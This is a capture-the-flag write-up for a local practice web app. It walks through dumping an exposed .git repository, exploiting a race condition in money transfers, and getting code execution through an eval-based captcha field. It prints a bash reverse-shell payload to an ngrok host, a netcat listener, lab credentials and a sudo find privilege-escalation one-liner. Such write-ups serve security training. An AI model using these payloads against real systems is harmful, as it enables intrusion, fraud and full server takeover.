Day 3 Challenge Writeups
Vulnbydefault Day 3 Writeup
On opening the site url we have given the following interface
It has login functionality but don't have register stuff
Recon
Lets start enumeration
First we would check the source of index
lets use cyberchef to decode that encoded stuff use this site
lets fuzz the site
there is .git directory you can also use this extension which would help you in finding .git in machines https://addons.mozilla.org/en-US/firefox/addon/dotgit/ lets use git-dumper to dump the .git directory https://github.com/arthaud/git-dumper you can install it using following command
pip install git-dumper
Now we would dump git repository
git-dumper <.git URL> <output directory>
git-dumper http://127.0.0.1:3001/.git/HEAD source
Here we got robots.txt file
lets check git logs
git log -p
lets login using any user
we got second flag
lets check for credit card eligibility
lets check eligibility
alright we need balance at least 11000
but we have 5000 in our account. Let's check transfer page:
so it has username for recipient and amount. Let's check transfer.php
alright it checks for user if it is alice or bob
we can check in source code that there is no logic which checks for race condition
lets check for race condition
Intercept the request for transfer money
send it to repeater lets make group
we would select last option for parallel requests
now click on send group (parallel)
now check dashboard
it has negative balance
lets login using bob user
bob:bobisgoat
we have second flag
Now we are eligible for card
lets check the eligibility because we have balance greater than 11000
before that lets check the source code eligibility.php
so our input is checked first and then given to eval function
in the check list system function is not included lets use that function
intercept the request in burpsuite
in captcha_num2 i would change it to system("id")
alright we have got rce
lets use reverse shell payload first start listener on any port i would use 4001
nc -lvnp 4001
ngrok tcp 4001
credit_score=300&address=Sulitech&requested_balance=50&usage_purpose=online_use&captcha=9&captcha_num1=3&captcha_num2=system("bash -c 'bash -i >& /dev/tcp/ngrop/PORT 0>&1'")
got shell
lets check /etc/passwd
we have developer user lets check web root
lets check the db folder
lets check initialize.php file
so we got developer user password
developer:rootm3l3ts$33
use this to stabilize the shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
on /home/developer we have user.txt
lets check sudo -l
go to this site
sudo find . -exec /bin/sh \; -quit
